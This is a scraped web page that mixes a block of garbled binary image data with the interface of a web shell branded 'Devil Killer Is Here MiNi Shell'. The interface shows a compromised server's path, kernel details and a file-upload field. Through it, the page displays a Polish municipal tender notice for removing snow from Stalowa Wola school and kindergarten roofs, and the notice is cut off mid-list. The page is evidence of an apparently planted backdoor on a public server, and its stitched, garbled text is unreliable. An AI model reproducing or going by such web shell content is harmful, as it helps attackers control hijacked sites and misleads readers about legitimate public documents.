JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220120/0002801001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług w zakresie usuwania śniegu z dachów obiektów jednostek podlegających Gminie Stalowa Wola w sezonie zimowym 2022 r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi zamawiający centralny</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Stalowowolskie Centrum Usług Wspólnych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 384503002</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Al. Jana Pawła II 25A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Stalowa Wola</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-450</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL824 - Tarnobrzeski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@stalowawola.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.stalowawola.pl//?c=mdTresc-cmPokaz-1657</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług w zakresie usuwania śniegu z dachów obiektów jednostek podlegających Gminie Stalowa Wola w sezonie zimowym 2022 r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f3950501-7763-11ec-beb3-a2bfa38226ab</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00028010</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-01-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-f3950501-7763-11ec-beb3-a2bfa38226ab <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/mp-client/search/ocds-148610-f3950501-7763-11ec-beb3-a2bfa38226ab</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">3.<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Instrukcji interaktywnej korzystania z platformy e-zamówienia pod adresem:<br/>https://epzpygmggrsicd.blob.core.windows.net/pod/2021/10/Komunikacji-wpostepowaniu-<br/>3.2_20211016.pdf<br/>4. Składanie ofert/wniosków/prac konkursowych dostępne jest tylko dla użytkowników będących<br/>Wykonawcami, posiadającymi uprawnienie do składania ofert/wniosków/prac konkursowych. W celu<br/>założenia oferty należy przejść do szczegółów postępowania, wybrać zakładkę oferty/wnioski,<br/>następnie przycisk złóż ofertę.<br/>5. Ofertę należy złożyć na właściwym formularzu (aktualnym formularzu ofertowym pobranym z<br/>platformy do tego postępowania) – jeśli formularz będzie nieprawidłowy system poinformuje o tym w<br/>trakcie składania oferty.<br/>6. W celu pobrania wzorców formularza (ofertowego, wniosku o dopuszczenie do udziału w<br/>postępowaniu lub konkursowego) oraz pozostałych dokumentów postępowania należy przejść do<br/>szczegółów postępowania.<br/>7. Funkcjonalność wypełnienia formularza dostępna jest tylko dla użytkowników będących<br/>Wykonawcami posiadającymi uprawnienie do Przygotowania ofert/wniosków/prac konkursowych.<br/>8. Ofertę należy złożyć przed terminem składania ofert – oferta złożona po terminie nie zostanie<br/>przyjęta.<br/>9. Formularz ofertowy i złączniki należy podpisać cyfrowo. Dokumenty można podpisać podpisem<br/>kwalifikowanym. Wypełniony formularz oferty podpisujemy podpisem wewnętrznym. Załączniki można<br/>podpisać podpisem zewnętrznym lub wewnętrznym. Dokumenty spakowane należy podpisać<br/>zewnętrznym. Jeśli będzie brakowało podpisu system poinformuje o tym w trakcie składania<br/>dokumentów, zostaną one przyjęte przez Platformę mimo braku podpisu.<br/>10. Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej,<br/>email: rkordyka@stalowawola.pl lub zp@stalowawola.pl. lub za pośrednictwem ePuap.<br/>11. Szczegółowa instrukcja dotycząca składania ofert dostępna jest pod adresem:<br/>https://epzpygmggrsicd.blob.core.windows.net/pod/2021/10/Oferty-3.2¬¬_20211016.pdf<br/>3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>	administratorem Pani/Pana danych osobowych jest Dyrektor Stalowowolskiego Centrum Usług Wspólnych al. Jana Pawła II 25A, 37-450 Stalowa Wola – Pani Danuta Bednarz.<br/>	inspektorem ochrony danych osobowych w Stalowowolskim Centrum Usług Wspólnych jest Pani Alina Pyz ODO PARTNER, Kępa Rzeczycka 10, 37-455 Radomyśl nad Sanem, adres e-mail: odopartner@gmail.com telefon 604 274 299.<br/>	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego „Świadczenie usług w zakresie usuwania śniegu z dachów obiektów jednostek podlegających Gminie Stalowa Wola w sezonie zimowym 2022 r.” ” prowadzonym w trybie zamówienia podstawowego zgodnie z art. 275 pkt 1 ustawy Pzp.<br/>	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy Pzp.	<br/>	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;	<br/>	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;	<br/>	posiada Pani/Pan:	<br/>	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ;<br/>	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ;	<br/>	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;	<br/>	nie przysługuje Pani/Panu:<br/> w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-II.271.9.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia świadczenie usług w zakresie usuwania śniegu z dachów obiektów jednostek podlegających Gminie Stalowa Wola (wraz ze z hałdowaniem w miejscu wskazanym przez Zamawiającego do odległości 2 m od obiektu w sezonie zimowym 2022 r.”, w podziale na trzy części:<br/>Część 1:<br/>1)	Przedszkole nr 1 <br/>ul. Niezłomnych 2A<br/>37-450 Stalowa Wola <br/>NIP: 8651520325, REGON: 830220609<br/>2)	Przedszkole nr 2 im. Jana Brzechwy <br/>ul. Skoczyńskiego 5<br/>37-450 Stalowa Wola<br/>NIP: 8651520354 REGON: 830220615<br/>3)	Przedszkole nr 3<br/>ul. Poniatowskiego 57<br/>37-450 Stalowa Wola<br/>NIP: 8651494378, REGON: 830220696<br/>4)	Przedszkole nr 6<br/>ul. Partyzantów 10<br/>37-450 Stalowa Wola<br/>NIP: 8651494792, REGON: 830220727<br/>5)	Przedszkole nr 9<br/>Al. Jana Pawła II 5<br/>37-450 Stalowa Wola <br/>NIP: 865149480, REGON: 830220740 <br/>6)	Przedszkole nr 10 im. Marii Konopnickiej<br/>Al. Jana Pawła II 11<br/>37-450 Stalowa Wola <br/>NIP: 8651520377, REGON 830220756<br/>7)	Przedszkole nr 11<br/>Al. Jana Pawła II 6<br/>37-450 Stalowa Wola <br/>NIP: 8651494384, REGON: 830220762<br/>8)	Przedszkole Integracyjne nr 12<br/>ul. Okulickiego 20<br/>37-450 Stalowa Wola <br/>NIP: 8651500311, REGON:830220779<br/>9)	Przedszkole nr 15<br/>ul. Obrońców Westerplatte 1<br/>37-450 Stalowa Wola <br/>NIP: 8651522034, REGON: 830220791<br/>10) Przedszkole nr 18<br/> ul. Józefa Poniatowskiego 33<br/>37-450 Stalowa Wola<br/>NIP: 8651427264, REGON: 830220816<br/>2.	Zakres przedmiotu zamówienia obejmuje odśnieżanie dachów: <br/>Część nr 1<br/>1)	dach budynku dwupiętrowy o powierzchni ok. 366 m2 x 2 usługa łączna powierzchnia ok. 732 m2 Przedszkole nr 1 przy ul. Niezłomnych 2A <br/>2)	dach budynku o powierzchni ok. 350 m2 x 3 usługa łączna powierzchnia ok. 1050 m2 Przedszkole nr 2 przy ul. Skoczyńskiego 5.<br/>3)	dach budynku płaski o powierzchni ok. 647,80 m2 Przedszkole nr 3 przy ul. Poniatowskiego 57.<br/>4)	dach budynku o powierzchni ok. 500 m2 x 2 usługa łączna powierzchnia ok. 1000 m2 Przedszkole nr 6 przy ul. Partyzantów 10.<br/>5)	dach budynku o powierzchni ok. 700 m2 x 4 usługa łączna powierzchnia ok. 2800 m2 Przedszkole nr 9 Al. Jana Pawła II 5. <br/>6)	dach budynku płaski o powierzchni ok. 890 m2 x 2 usługa łączna powierzchnia ok. 1780 m2 Przedszkole nr 10 Al. Jana Pawła II 11.<br/>7)	dach budynku płaski o powierzchni ok. 400 m2 Przedszkole nr 11 Al. Jana Pawła II 6. <br/>8)	dach budynku o powierzchni ok. 877 m2 Przedszkole Integracyjne nr 12 im. J.Ch. Andersena przy ul. Okulickiego 20<br/>9)	dach budynku o powierzchni ok. 999,66 m2 x 3 usługa łączna powierzchnia ok. 2998 m2 Przedszkole nr 15 przy ul. Obrońców Westerplatte 1.<br/>10)	dach budynku o powierzchni 400 m2 Przedszkole nr 18 przy ul. Poniatowskiego 33.<br/>Łączna powierzchnia (orientacyjna) w okresie realizacji zamówienia części wynosi: 12 685,60 m2 <br/>3.	Płatnikami za świadczoną usługę odśnieżania dachów na obiektach będą poszczególne jednostki organizacyjne podległe Gminie Stalowa Wola. <br/>4.	Wykonawca do dnia podpisania Umowy przekaże osobie odpowiedzialnej merytorycznie od strony Zamawiającego wykaz osób realizujących zamówienie oraz kopie aktualnych orzeczeń lekarskich dopuszczających te osoby do pracy na wysokości powyżej 3 m na cały okres trwania umowy. W razie potrzeby wykaz zgłoszonych pracowników może być rozszerzony w okresie umowy. W razie potrzeby wykaz zgłoszonych pracowników może być rozszerzony w okresie realizacji o nowych pracowników, również z załączeniem wymienionych orzeczeń lekarskich.<br/>5.	Prace wykonywane będą w czynnych, eksploatowanych obiektach: mogą być realizowane w każdym dniu tygodnia w godzinach uzgodnionych z Zamawiającym. <br/>6.	Przed rozpoczęciem odśnieżania dachu, należy wyznaczyć strefy zrzutu śniegu, w sposób widoczny je wygrodzić i przez cały okres zrzutu nie dopuścić pieszych lub parkowania samochodów. Strefa zrzutu powinny być wskazane przez Właściciela lub Zarządcę obiektu. <br/>7. Realizacja zamówienia będzie wykonywana w sposób opisany poniżej: <br/>1.) Zamawiający dokona zlecenia odśnieżania dachu, jeżeli grubość pokrywy śnieżnej na dachu osiągnie min. 15 cm. <br/>2.) Wykonawca jest zobowiązany do wykonywania usługi w następujący sposób: <br/>a.	za odśnieżony uważa się dach z którego usunięto warstwę śniegu, sople i wszelkie nawisy; <br/>b.	ze względu na możliwość uszkodzenia pokrycia dachów obiektów, zamawiający wymaga pozostawienia warstwy ok. 1,5 cm zlodowacenia przylegającego do odśnieżanego podłoża, o ile ono występuje, oraz wpisania w protokole odbioru prac grubości pozostawionej warstwy zlodowacenia;<br/>c.	niedopuszczalne jest tworzenie hałd śniegu na dachach;<br/>d.	do usuwania śniegu wykonawca użyje sprzętu, który nie będzie powodował uszkodzeń pokrycia dachowego odśnieżanych budynków; <br/>e.	hałdy śniegu nie mogą przylegać do elewacji odśnieżanego obiektu oraz nie mogą utrudniać ruchu pieszego i samochodowego. Hałdy nie mogą uniemożliwiać korzystania z wyjść, w tym także ewakuacyjnych z obiektów;<br/>f.	wszystkie uszkodzenia elewacji, pokryć dachowych oraz urządzeń będących w pobliżu, wynikłe przy odśnieżaniu, spowodowane między innymi przez nacisk zwałów z hałdowanego śniegu na elementy obiektu (takie jak bramy, drzwi itp.) - zostaną naprawione na koszt Wykonawcy; <br/>g.	każde miejsce zrzutu śniegu musi być wygrodzone i trwale oznakowane przez Wykonawcę, zgodnie z przepisami BHP; <br/>h.	śnieg zrzucony z dachów powinien zostać ;<br/>i.	Wykonawca musi dysponować osobami posiadającymi odpowiednie kwalifikacje oraz aktualne zezwolenia upoważniające do pracy na wysokości;<br/>j.	Wykonawca musi dysponować potencjałem technicznym niezbędnym do realizacji przedmiotu zamówienia;<br/>k.	usługa musi być wykonywana zgodnie z przepisami BHP;<br/>l.	Wykonawca zabezpieczy na bieżąco teren, na którym będzie wykonywana usługa, w sposób uniemożliwiający wyrządzenie szkód w mieniu lub osobom trzecim;<br/>m.	Wykonawca ma obowiązek być ubezpieczonym od odpowiedzialności cywilnej oraz następstw nieszczęśliwych wypadków dotyczących zatrudnionych pracowników oraz osób trzecich i mienia;<br/>n.	Zamawiający przewiduje kilkukrotne odśnieżanie dachów obiektów podczas trwania umowy, co uzależnione jest od zaistniałych warunków atmosferycznych; <br/>3.) Przy opracowaniu oferty należy wziąć pod uwagę fakt, że Zamawiający nie przewiduje zapłaty za gotowość tylko za efektywną pracę.<br/>4.) Obiekty do odśnieżania zgłaszane będą przez Zamawiającego na bieżąco (pisemnie), w razie wystąpienia okoliczności, w których niezbędne jest wykonanie usługi. <br/>5.) Odpowiedzialny za nadzór nad wykonaniem zleconych prac będzie kierownik poszczególnego obiektu.<br/>6.) Rozliczenie usługi nastąpi fakturami po wykonaniu i odbiorze prac. Podstawę do rozliczenia usługi będą stanowiły protokoły odbioru prac potwierdzone przez kierownika poszczególnego obiektu.<br/>7.) Wykonawca zobowiązany będzie przyjmować pisemne zlecenia (sms, e-mail lub faks) od Zamawiającego oraz wykonywania usługi określonej w zleceniu oraz przystępować do realizacji zlecenia w terminie określonym w ofercie.<br/>8.) Maksymalny czas realizacji zlecenia wymagany przez Zamawiającego wynosi 24 godziny od momentu zgłoszenia zlecenia przez Zamawiającego.<br/>9.) Zaleca się zaznajomienie z topografią terenu i dokonanie wizji lokalnej jako czynności pomocniczej przy przygotowaniu oferty. Brak udziału w wizji lokalnej obiektów nie wyklucza możliwości składania ofert. <br/>10.)	Wykonawca przed podpisaniem umowy wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności oraz następstw nieszczęśliwych wypadków dotyczących zatrudnionych pracowników oraz osób trzecich i mienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.12.) Opis wznowienia</h3> Odśnieżanie dachów w kolejnych sezonach zimowych <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny i kosztu </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia świadczenie usług w zakresie usuwania śniegu z dachów obiektów jednostek podlegających Gminie Stalowa Wola (wraz ze z hałdowaniem w miejscu wskazanym przez Zamawiającego do odległości 2 m od obiektu w sezonie zimowym 2022 r.”, w podziale na trzy części:Część 2:<br/>1)	Publiczna Szkoła Podstawowa nr 1 im. Wacława Górskiego <br/>ul. Romana Dmowskiego 9<br/>37-450 Stalowa Wola <br/>NIP: 8651427287, REGON: 000837413<br/>2) Publiczna Szkoła Podstawowa nr 2 <br/>ul. Mickiewicza 15<br/>37-450 Stalowa Wola <br/>NIP: 8652264568 REGON: 368003453<br/>3)	Publiczna Szkoła Podstawowa nr 3<br/>ul. Prymasa Wyszyńskiego 14<br/>37-450 Stalowa Wola <br/>NIP: 8651426997, REGON: 000837420<br/>4)	Publiczna Szkoła Podstawowa nr 4<br/>ul. Niezłomnych 1<br/>37-450 Stalowa Wola<br/>NIP: 8651427270 REGON: 000837436<br/>5)	Publiczna Szkoła Podstawowa nr 5<br/>ul. Energetyków 18<br/>37-450 Stalowa Wola<br/>NIP: 865140665, REGON: 000837442<br/>6)	Publiczna Szkoła Podstawowa nr 7<br/>ul. Okulickiego 14<br/>37-450 Stalowa Wola<br/>NIP: 8651427241 REGON: 000837465<br/>7)	Publiczna Szkoła Podstawowa nr 9<br/>ul. Rozwadowska 10<br/>37-450 Stalowa Wola<br/>NIP: 8652471913 REGON: 831201146<br/>8)	Publiczna Szkoła Podstawowa nr 11<br/>ul. Wojska Polskiego 9<br/>37-450 Stalowa Wola <br/>NIP: 8651450926, REGON: 001321670<br/>9)	Publiczna Szkoła Podstawowa nr 12<br/>ul. Poniatowskiego 55<br/>37-450 Stalowa Wola<br/>NIP: 8651451328, REGON:830003591<br/>Część nr 2<br/>1)	dach budynku o powierzchni ok. 981 m2 Publiczna Szkoła Podstawowa nr 1 im. W. Górskiego przy ul. Dmowskiego 9.<br/>2)	dach budynku o powierzchni ok. 1300 